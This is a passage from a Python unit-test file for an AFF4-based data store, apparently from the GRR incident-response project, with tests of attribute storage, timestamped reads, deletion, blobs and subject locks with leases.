self.assertListEqual(values, [("aff4:stored", "3", 4000), ("aff4:stored",
"2", 1000)])
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": [("4", 3000)]},
replace=True,
token=self.token)
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertListEqual(values, [("aff4:stored", "4", 3000)])
@DeletionTest
def testDeleteAttributes(self):
"""Test we can delete an attribute."""
predicate = "metadata:predicate"
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
data_store.DB.DeleteAttributes(
self.test_row, [predicate], sync=True, token=self.token)
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
@DeletionTest
def testMultiDeleteAttributes(self):
"""Test we can delete multiple attributes at once."""
test_rows = ["aff4:/row/%i" % i for i in range(0, 10)]
predicate_1 = "metadata:predicate1"
predicate_2 = "metadata:predicate2"
for row in test_rows:
data_store.DB.Set(row, predicate_1, "hello", token=self.token)
data_store.DB.Set(row, predicate_2, "hello", token=self.token)
self.assertEqual(10,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_1, token=self.token)))
self.assertEqual(10,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_2, token=self.token)))
data_store.DB.MultiDeleteAttributes(
test_rows, [predicate_1, predicate_2], token=self.token)
self.assertEqual(0,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_1, token=self.token)))
self.assertEqual(0,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_2, token=self.token)))
def CheckLength(self, predicate, l):
all_attributes = data_store.DB.ResolveMulti(
self.test_row, [predicate], timestamp=(0, 5000), token=self.token)
self.assertEqual(len(list(all_attributes)), l)
  def CheckLast(self, predicate, expected_value, expected_ts):
stored, ts = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, expected_value)
    self.assertEqual(ts, expected_ts)
@DeletionTest
def testDeleteAttributesTimestamps(self):
"""Test we can delete an attribute in a time range."""
predicate = "metadata:tspredicate"
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello2000",
timestamp=2000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello3000",
timestamp=3000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello4000",
timestamp=4000,
replace=False,
token=self.token)
    # Check it's there.
self.CheckLast(predicate, "hello4000", 4000)
self.CheckLength(predicate, 4)
# Delete timestamps between 0 and 1500.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=0,
end=1500,
sync=True,
token=self.token)
self.CheckLast(predicate, "hello4000", 4000)
self.CheckLength(predicate, 3)
# Delete timestamps between 3000 and 4500.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=3000,
end=4500,
sync=True,
token=self.token)
self.CheckLast(predicate, "hello2000", 2000)
self.CheckLength(predicate, 1)
# Delete everything.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=0,
end=5000,
sync=True,
token=self.token)
self.CheckLast(predicate, None, 0)
self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubject(self):
predicate = "metadata:tspredicate"
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.DeleteSubject(self.test_row, token=self.token)
data_store.DB.Flush()
self.CheckLength(predicate, 0)
# This should work with the sync argument too.
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.DeleteSubject(self.test_row, token=self.token, sync=True)
self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubjects(self):
row_template = "aff4:/deletesubjectstest%d"
rows = [row_template % i for i in xrange(100)]
predicate = "metadata:tspredicate"
for i, row in enumerate(rows):
data_store.DB.Set(
row,
predicate,
"hello%d" % i,
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.Flush()
data_store.DB.DeleteSubjects(rows[20:80], token=self.token)
data_store.DB.Flush()
res = dict(
data_store.DB.MultiResolvePrefix(rows, predicate, token=self.token))
for i in xrange(100):
if 20 <= i < 80:
# These rows have been deleted.
self.assertNotIn(row_template % i, res)
else:
# These rows should be present.
self.assertIn(row_template % i, res)
def testMultiResolvePrefix(self):
"""tests MultiResolvePrefix."""
rows = self._MakeTimestampedRows()
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:3", "metadata:7"], token=self.token))
subject_names = subjects.keys()
subject_names.sort()
self.assertEqual(len(subjects), 2)
self.assertEqual(subject_names, [u"aff4:/row:3", u"aff4:/row:7"])
rows = []
for r in range(1, 6):
row_name = "aff4:/prefix_row_%d" % r
rows.append(row_name)
for i in range(1, 6):
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.Set(
row_name,
"metadata:%s" % ("X" * i),
str(i),
timestamp=timestamp,
token=self.token)
subjects = dict(
data_store.DB.MultiResolvePrefix(rows, ["metadata:"], token=self.token))
self.assertItemsEqual(subjects.keys(), rows)
row = subjects["aff4:/prefix_row_4"]
self.assertEqual(len(row), 5)
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:XXX"], token=self.token))
self.assertItemsEqual(subjects.keys(), rows)
for row in subjects.values():
# Those with 3-5 X's.
self.assertEqual(len(row), 3)
self.assertIn((u"metadata:XXX", "3", 3000), row)
self.assertNotIn((u"metadata:XX", "2", 2000), row)
# Test unicode subjects.
unicode_string = u"this is a uñîcödé string"
attributes = set()
for i in range(5, 10):
attributes.add(("metadata:%s" % i, "data%d" % i))
data_store.DB.MultiSet(
unicode_string, {"metadata:%s" % i: ["data%d" % i]}, token=self.token)
result = dict(
data_store.DB.MultiResolvePrefix(
[unicode_string], ["metadata:"], token=self.token))
result_set = set((k, v) for k, v, _ in result[unicode_string])
self.assertEqual(result_set, attributes)
def _MakeTimestampedRows(self):
# Make some rows.
rows = []
for i in range(1, 6):
row_name = "aff4:/row:%s" % i
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.Set(
row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
rows.append(row_name)
for i in range(6, 11):
row_name = "aff4:/row:%s" % i
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.MultiSet(
row_name, {"metadata:%s" % i: [i]},
timestamp=timestamp,
token=self.token)
rows.append(row_name)
return rows
def _CheckResultTimestamps(self, result, expected_timestamps):
timestamps = []
for predicates in result.itervalues():
for predicate in predicates:
timestamps.append(predicate[2])
self.assertListEqual(sorted(timestamps), sorted(expected_timestamps))
def testMultiResolvePrefixTypePreservation(self):
"""Check result subjects have same format as original calls."""
rows = [
"aff4:/row:str",
u"aff4:/row:unicode",
rdfvalue.RDFURN("aff4:/row:URN"),
"aff4:/row:str",
u"aff4:/row:unicode",
rdfvalue.RDFURN("aff4:/row:URN"),
]
i = 0
for row_name in rows:
timestamp = rdfvalue.RDFDatetime(1000 + i)
data_store.DB.Set(
row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
i += 1
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:0", "metadata:2", "metadata:4"], token=self.token))
self.assertEqual(
set([type(s) for s in subjects]), set([type(s) for s in rows]))
self.assertIn(rows[0], subjects)
self.assertIn(rows[2], subjects)
self.assertIn(rows[4], subjects)
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder1(self):
predicate1 = "metadata:predicate1"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order1"
# Set 100 values with increasing timestamps.
for i in range(100):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order.
    # This test, along with the next one, checks that no matter how the
    # values were set, they are returned sorted by timestamp in decreasing
    # order when fetched.
result = data_store.DB.ResolvePrefix(
subject,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder2(self):
predicate1 = "metadata:predicate1"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order2"
# Set 100 values with timestamps starting in the future and going to
# the past.
for i in reversed(range(100)):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order.
    # This test, along with the previous one, checks that no matter how the
    # values were set, they are returned sorted by timestamp in decreasing
    # order when fetched.
result = data_store.DB.ResolvePrefix(
subject,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn1(self):
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column1"
# Set 100 values with increasing timestamps for each predicate.
for i in range(100):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
data_store.DB.Set(
subject,
predicate2,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order
# per column.
    # This test, along with the previous one, checks that no matter how the
    # values were set, they are returned sorted by timestamp in decreasing
    # order when fetched.
result = list(
data_store.DB.ResolvePrefix(
subject,
"metadata:predicate",
timestamp=data_store.DB.ALL_TIMESTAMPS,
limit=1000,
token=self.token))
predicate1_results = [r for r in result if r[0] == predicate1]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
i * 1000))
predicate2_results = [r for r in result if r[0] == predicate2]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrderPerColumn2(self):
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order_per_column2"
# Set 100 values for each predicate with timestamps starting in the
# future and going to the past.
for i in reversed(range(100)):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
data_store.DB.Set(
subject,
predicate2,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order
# per column.
    # This test, along with the previous one, checks that no matter how the
    # values were set, they are returned sorted by timestamp in decreasing
    # order when fetched.
result = list(
data_store.DB.ResolvePrefix(
subject,
"metadata:predicate",
timestamp=data_store.DB.ALL_TIMESTAMPS,
limit=1000,
token=self.token))
predicate1_results = [r for r in result if r[0] == predicate1]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate1_results[result_index], (predicate1, str(i),
i * 1000))
predicate2_results = [r for r in result if r[0] == predicate2]
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(predicate2_results[result_index], (predicate2, str(i),
i * 1000))
def testScanAttribute(self):
data_store.DB.Set("aff4:/A", "aff4:foo", "A value", token=self.token)
for i in range(1, 10):
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " old value",
timestamp=2000,
token=self.token)
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " value",
timestamp=2000,
token=self.token)
data_store.DB.Set(
"aff4:/B/" + str(i),
"aff4:foo",
"B " + str(i) + " older value",
timestamp=1900,
token=self.token,
replace=False)
# Something with a different attribute, which should not be included.
data_store.DB.Set(
"aff4:/B/1.1",
"aff4:foo2",
"B 1.1 other value",
timestamp=2000,
token=self.token)
data_store.DB.Set("aff4:/C", "aff4:foo", "C value", token=self.token)
values = [(r[1], r[2])
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", token=self.token)]
self.assertEqual(values, [(2000, "B " + str(i) + " value")
for i in range(1, 10)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", max_records=2, token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(1, 3)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B", "aff4:foo", after_urn="aff4:/B/2", token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 10)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/B",
u"aff4:foo",
after_urn=rdfvalue.RDFURN("aff4:/B/2"),
max_records=2,
token=self.token)
]
self.assertEqual(values, ["B " + str(i) + " value" for i in range(3, 5)])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/", "aff4:foo", token=self.token)
]
self.assertEqual(
values, ["A value"] + ["B " + str(i) + " value"
for i in range(1, 10)] + ["C value"])
values = [
r[2]
for r in data_store.DB.ScanAttribute("", "aff4:foo", token=self.token)
]
self.assertEqual(
values, ["A value"] + ["B " + str(i) + " value"
for i in range(1, 10)] + ["C value"])
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/", "aff4:hash", "h1", token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/AAAAA",
"aff4:hash",
"h2",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha1/AAAAB",
"aff4:hash",
"h3",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/", "aff4:hash", "h4", token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/AAAAA",
"aff4:hash",
"h5",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha256/AAAAB",
"aff4:hash",
"h6",
token=self.token)
data_store.DB.Set(
"aff4:/files/hash/generic/sha90000",
"aff4:hash",
"h7",
token=self.token)
(value, _) = data_store.DB.Resolve(
"aff4:/files/hash/generic/sha90000", "aff4:hash", token=self.token)
self.assertEqual(value, "h7")
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/files/hash", "aff4:hash", token=self.token)
]
self.assertEqual(values, ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
values = [
r[2]
for r in data_store.DB.ScanAttribute(
"aff4:/files/hash",
"aff4:hash",
token=self.token,
relaxed_order=True)
]
self.assertEqual(sorted(values), ["h1", "h2", "h3", "h4", "h5", "h6", "h7"])
def testScanAttributes(self):
for i in range(0, 7):
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:foo",
"C foo " + str(i) + " value",
timestamp=10000,
token=self.token)
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:foo",
"C foo " + str(i) + " old value",
timestamp=9000,
token=self.token,
replace=False)
for i in range(3, 10):
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:bar",
"C bar " + str(i) + " value",
timestamp=15000,
token=self.token)
data_store.DB.Set(
"aff4:/C/" + str(i),
"aff4:bar",
"C bar " + str(i) + " old value",
timestamp=9500,
token=self.token,
replace=False)
data_store.DB.Set(
"aff4:/C/5a",
"aff4:baz",
"C baz value",
timestamp=9800,
token=self.token)
results = list(
data_store.DB.ScanAttributes(
"aff4:/C", ["aff4:foo", "aff4:bar"], token=self.token))
self.assertEqual(len(results), 10)
self.assertEqual([s for s, _ in results],
["aff4:/C/" + str(i) for i in range(10)])
self.assertEqual(results[0][1], {"aff4:foo": (10000, "C foo 0 value")})
self.assertEqual(results[5][1], {
"aff4:bar": (15000, "C bar 5 value"),
"aff4:foo": (10000, "C foo 5 value")
})
self.assertEqual(results[9][1], {"aff4:bar": (15000, "C bar 9 value")})
results = list(
data_store.DB.ScanAttributes(
"aff4:/C", ["aff4:foo", "aff4:bar"],
max_records=5,
token=self.token))
self.assertEqual(len(results), 5)
def testRDFDatetimeTimestamps(self):
test_rows = self._MakeTimestampedRows()
# Make sure all timestamps are set correctly.
result = dict(
data_store.DB.MultiResolvePrefix(
test_rows, ["metadata:"], token=self.token))
self._CheckResultTimestamps(result, range(1000, 11000, 1000))
# Now MultiResolve by timestamp.
timestamp = (rdfvalue.RDFDatetime(3000), rdfvalue.RDFDatetime(8000))
result = dict(
data_store.DB.MultiResolvePrefix(
test_rows, ["metadata:"], token=self.token, timestamp=timestamp))
# Timestamp selection is inclusive so we should have 3k-8k.
self._CheckResultTimestamps(result, range(3000, 9000, 1000))
# Now test timestamped attributes.
row_name = "aff4:/attribute_test_row"
attribute_name = "metadata:test_attribute"
attributes_to_set = {
attribute_name: [(i, rdfvalue.RDFDatetime(i))
for i in xrange(1000, 11000, 1000)]
}
data_store.DB.MultiSet(
row_name, attributes_to_set, replace=False, token=self.token)
# Make sure all timestamps are set correctly.
result = dict(
data_store.DB.MultiResolvePrefix(
[row_name], ["metadata:"],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
self._CheckResultTimestamps(result, range(1000, 11000, 1000))
if self.TEST_DELETION:
# Delete some of them.
data_store.DB.DeleteAttributes(
row_name, [attribute_name],
start=rdfvalue.RDFDatetime(2000),
end=rdfvalue.RDFDatetime(4000),
token=self.token)
# Make sure that passing start==end deletes that version.
data_store.DB.DeleteAttributes(
row_name, [attribute_name],
start=rdfvalue.RDFDatetime(6000),
end=rdfvalue.RDFDatetime(6000),
token=self.token)
result = dict(
data_store.DB.MultiResolvePrefix(
[row_name], ["metadata:"],
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
expected_timestamps = [1000, 5000, 7000, 8000, 9000, 10000]
self._CheckResultTimestamps(result, expected_timestamps)
@DBSubjectLockTest
def testDBSubjectLocks(self):
"""Test lock locking."""
predicate = u"metadata:predicateÎñţér"
subject = u"aff4:/metadata:rowÎñţér"
# t1 is holding a lock on this row.
with data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token):
# This means that modification of this row will fail using a different
# lock.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
data_store.DB.Set(subject, predicate, "1", token=self.token)
self.assertEqual(
data_store.DB.Resolve(subject, predicate, token=self.token)[0], "1")
t2 = data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token)
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
t2.Release()
t3 = data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token)
self.assertTrue(t3.CheckLease())
t3.Release()
@DBSubjectLockTest
def testDBSubjectLockIndependence(self):
"""Check that locks don't influence each other."""
subject = u"aff4:/metadata:rowÎñţér"
subject2 = u"aff4:/metadata:rowÎñţér2"
t1 = data_store.DB.DBSubjectLock(subject, lease_time=100, token=self.token)
# Check it's locked.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
# t2 is holding a lock on this row.
t2 = data_store.DB.DBSubjectLock(subject2, lease_time=100, token=self.token)
# This means that modification of this row will fail using a different
# lock.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject2,
lease_time=100,
token=self.token)
t2.Release()
# Subject 1 should still be locked.
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
subject,
lease_time=100,
token=self.token)
t1.Release()
@DBSubjectLockTest
def testDBSubjectLockLease(self):
# This needs to be current time or cloud bigtable server will reply with
# deadline exceeded because the RPC is too old.
now = int(time.time())
with test_lib.FakeTime(now):
with data_store.DB.DBSubjectLock(
self.lease_row, lease_time=100, token=self.token) as lock:
self.assertEqual(lock.CheckLease(), 100)
self.assertTrue(lock.locked)
# Set our expiry time to now + 2 * 100
lock.UpdateLease(2 * 100)
self.assertEqual(lock.CheckLease(), 2 * 100)
        # Deliberately call Release() twice; __exit__ will call it again.
lock.Release()
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiryWithExtension(self):
now = int(time.time())
# Cloud Bigtable RPC library doesn't like long, convert to int
lease_time = 100
with test_lib.FakeTime(now):
lock = data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
self.assertEqual(lock.expires, int(now + lease_time) * 1e6)
lock.UpdateLease(2 * lease_time)
self.assertEqual(lock.expires, int(now + (2 * lease_time)) * 1e6)
# Lock should still be active
with test_lib.FakeTime(now + lease_time + 1):
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
lease_time=lease_time,
token=self.token)
# Now it is expired
with test_lib.FakeTime(now + (2 * lease_time) + 1):
data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
@DBSubjectLockTest
def testDBSubjectLockLeaseExpiry(self):
now = int(time.time())
lease_time = 100
with test_lib.FakeTime(now):
lock = data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
self.assertEqual(lock.CheckLease(), lease_time)
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
lease_time=lease_time,
token=self.token)
# Almost expired
with test_lib.FakeTime(now + lease_time - 1):
self.assertRaises(
data_store.DBSubjectLockError,
data_store.DB.DBSubjectLock,
self.lease_row,
lease_time=lease_time,
token=self.token)
# Expired
after_expiry = now + lease_time + 1
with test_lib.FakeTime(after_expiry):
lock = data_store.DB.DBSubjectLock(
self.lease_row, lease_time=lease_time, token=self.token)
self.assertEqual(lock.CheckLease(), lease_time)
self.assertEqual(lock.expires, int((after_expiry + lease_time) * 1e6))
@DBSubjectLockTest
def testLockRetryWrapperTemporaryFailure(self):
"""Two failed attempts to get the lock, then a succcess."""
lock = mock.MagicMock()
with mock.patch.object(time, "sleep", return_value=None) as mock_time:
with mock.patch.object(
data_store.DB,
"DBSubjectLock",
side_effect=[
data_store.DBSubjectLockError("1"),
data_store.DBSubjectLockError("2"), lock
]):
lock = data_store.DB.LockRetryWrapper(
"aff4:/something", token=self.token)
# We slept and retried twice
self.assertEqual(mock_time.call_count, 2)
lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperNoBlock(self):
subject = "aff4:/noblocklock"
lock = data_store.DB.DBSubjectLock(
subject, lease_time=100, token=self.token)
with mock.patch.object(time, "sleep", return_value=None) as mock_time:
with self.assertRaises(data_store.DBSubjectLockError):
data_store.DB.LockRetryWrapper(
subject, lease_time=100, token=self.token, blocking=False)
self.assertEqual(mock_time.call_count, 0)
lock.Release()
@DBSubjectLockTest
def testLockRetryWrapperCompleteFailure(self):
subject = "aff4:/subject"
# We need to sync this delete or it happens after we take the lock and
# messes up the test.
data_store.DB.DeleteSubject(subject, token=self.token, sync=True)
lock = data_store.DB.DBSubjectLock(
subject, lease_time=100, token=self.token)
# By mocking out sleep we can ensure all retries are exhausted.
with mock.patch.object(time, "sleep", return_value=None):
with self.assertRaises(data_store.DBSubjectLockError):
data_store.DB.LockRetryWrapper(
subject, lease_time=100, token=self.token)
lock.Release()
def testTimestamps(self):
"""Check that timestamps are reasonable."""
predicate = "metadata:predicate"
subject = "aff4:test_timestamps"
# Extend the range of valid timestamps returned from the table to account
# for potential clock skew.
start = long(time.time() - 60) * 1e6
data_store.DB.Set(subject, predicate, "1", token=self.token)
stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)
# Check the time is reasonable
end = long(time.time() + 60) * 1e6
self.assertTrue(ts >= start and ts <= end)
self.assertEqual(stored, "1")
def testSpecificTimestamps(self):
"""Check arbitrary timestamps can be specified."""
predicate = "metadata:predicate"
subject = "aff4:/test_specific_timestamps"
# Check we can specify a timestamp
data_store.DB.Set(subject, predicate, "2", timestamp=1000, token=self.token)
stored, ts = data_store.DB.Resolve(subject, predicate, token=self.token)
# Check the time is reasonable
self.assertEqual(ts, 1000)
self.assertEqual(stored, "2")
def testNewestTimestamps(self):
"""Check that NEWEST_TIMESTAMP works as expected."""
predicate1 = "metadata:predicate1"
predicate2 = "metadata:predicate2"
# Check we can specify a timestamp
data_store.DB.Set(
self.test_row,
predicate1,
"1.1",
timestamp=10000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate1,
"1.2",
timestamp=20000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate2,
"2.1",
timestamp=11000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate2,
"2.2",
timestamp=22000,
replace=False,
token=self.token)
result = data_store.DB.ResolvePrefix(
self.test_row,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
# Should return 2 results. Newest should be first.
values = [x[1] for x in result]
self.assertEqual(len(values), 2)
self.assertListEqual(values, ["1.2", "1.1"])
times = [x[2] for x in result]
self.assertListEqual(times, [20000, 10000])
result = data_store.DB.ResolvePrefix(
self.test_row,
predicate1,
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token)
# Should return 1 result - the most recent.
self.assertEqual(len(result), 1)
self.assertEqual(result[0][1], "1.2")
self.assertEqual(result[0][2], 20000)
result = list(
data_store.DB.ResolvePrefix(
self.test_row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token))
self.assertEqual(len(result), 4)
self.assertListEqual([r for r in result if r[0] == "metadata:predicate1"],
[(u"metadata:predicate1", "1.2", 20000),
(u"metadata:predicate1", "1.1", 10000)])
self.assertListEqual([r for r in result if r[0] == "metadata:predicate2"],
[(u"metadata:predicate2", "2.2", 22000),
(u"metadata:predicate2", "2.1", 11000)])
result = list(
data_store.DB.ResolvePrefix(
self.test_row,
"metadata:",
timestamp=data_store.DB.NEWEST_TIMESTAMP,
token=self.token))
# Should only return the latest version.
self.assertItemsEqual(result, [(u"metadata:predicate1", "1.2", 20000),
(u"metadata:predicate2", "2.2", 22000)])
@DeletionTest
def testTimestampEdgeCases(self):
row = "aff4:/row"
attribute = "metadata:attribute"
for i in range(4):
# First TS is 0!
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.MultiSet(
row, {attribute: [i]},
timestamp=timestamp,
replace=False,
token=self.token)
rows = data_store.DB.ResolvePrefix(
row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(rows), 4)
self.assertItemsEqual([r[2] for r in rows], [0, 1000, 2000, 3000])
data_store.DB.DeleteAttributes(
row, [attribute], start=0, end=0, token=self.token)
rows = data_store.DB.ResolvePrefix(
row,
"metadata:",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertEqual(len(rows), 3)
self.assertItemsEqual([r[2] for r in rows], [1000, 2000, 3000])
def testResolvePrefix(self):
predicate = "metadata:predicate"
subject = "aff4:/test_resolve_regex_prefix"
# Check we can specify a timestamp
data_store.DB.Set(subject, predicate, "3", token=self.token)
results = [
x
for x in data_store.DB.ResolvePrefix(
subject, "metadata:", token=self.token)
]
self.assertEqual(len(results), 1)
# Value
self.assertEqual(results[0][1], "3")
# Predicate
self.assertEqual(results[0][0], predicate)
def testResolveMulti(self):
"""Test regex Multi Resolving works."""
subject = "aff4:/resolve_multi"
predicates = []
predicate_values = []
for i in range(0, 100):
predicate = "metadata:predicate" + str(i)
predicates.append(predicate)
predicate_values.append("Cell " + predicate)
data_store.DB.Set(
subject,
predicate,
"Cell " + predicate,
timestamp=1000,
token=self.token)
results = [
x
for x in data_store.DB.ResolveMulti(
subject, predicates, token=self.token)
]
self.assertEqual(len(results), 100)
self.assertItemsEqual(predicates, [x[0] for x in results])
self.assertItemsEqual(predicate_values, [x[1] for x in results])
# Now try to query for non existent predicates.
predicates = predicates[:10]
predicate_values = predicate_values[:10]
for i in range(10):
predicates.append("metadata:not_existing" + str(i))
results = [
x
for x in data_store.DB.ResolveMulti(
subject, predicates, token=self.token)
]
self.assertEqual(10, len(results))
self.assertItemsEqual(predicates[:10], [x[0] for x in results])
self.assertItemsEqual(predicate_values, [x[1] for x in results])
def testBlobs(self):
data = "randomdata" * 50
identifier = data_store.DB.StoreBlob(data, token=self.token)
self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)
empty_digest = hashlib.sha256().hexdigest()
self.assertFalse(data_store.DB.BlobExists(empty_digest, token=self.token))
self.assertIsNone(data_store.DB.ReadBlob(empty_digest, token=self.token))
@DeletionTest
def testBlobDeletion(self):
data = "randomdata" * 50
identifier = data_store.DB.StoreBlob(data, token=self.token)
self.assertTrue(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), data)
data_store.DB.DeleteBlob(identifier, token=self.token)
self.assertFalse(data_store.DB.BlobExists(identifier, token=self.token))
self.assertEqual(data_store.DB.ReadBlob(identifier, token=self.token), None)
def testAFF4BlobImage(self):
# 500k
data = "randomdata" * 50 * 1024
identifier = data_store.DB.StoreBlob(data, token=self.token)
# Now create the image containing the blob.
fd = aff4.FACTORY.Create(
"aff4:/C.1235/image", standard.BlobImage, token=self.token)
fd.SetChunksize(512 * 1024)
fd.Set(fd.Schema.STAT())
fd.AddBlob(identifier.decode("hex"), len(data))
fd.Close(sync=True)
# Chunks are written async, we have to flush here.
data_store.DB.Flush()
# Check if we can read back the data.
fd = aff4.FACTORY.Open("aff4:/C.1235/image", token=self.token)
self.assertEqual(
fd.read(len(data)), data,
"Data read back from aff4image doesn't match.")
fd.Close()
def testDotsInDirectory(self):
"""Dots are special in MongoDB, check that they work in rows/indexes."""
for directory in [
"aff4:/C.1240/dir", "aff4:/C.1240/dir/a.b", "aff4:/C.1240/dir/a.b/c",
"aff4:/C.1240/dir/b"
]:
aff4.FACTORY.Create(
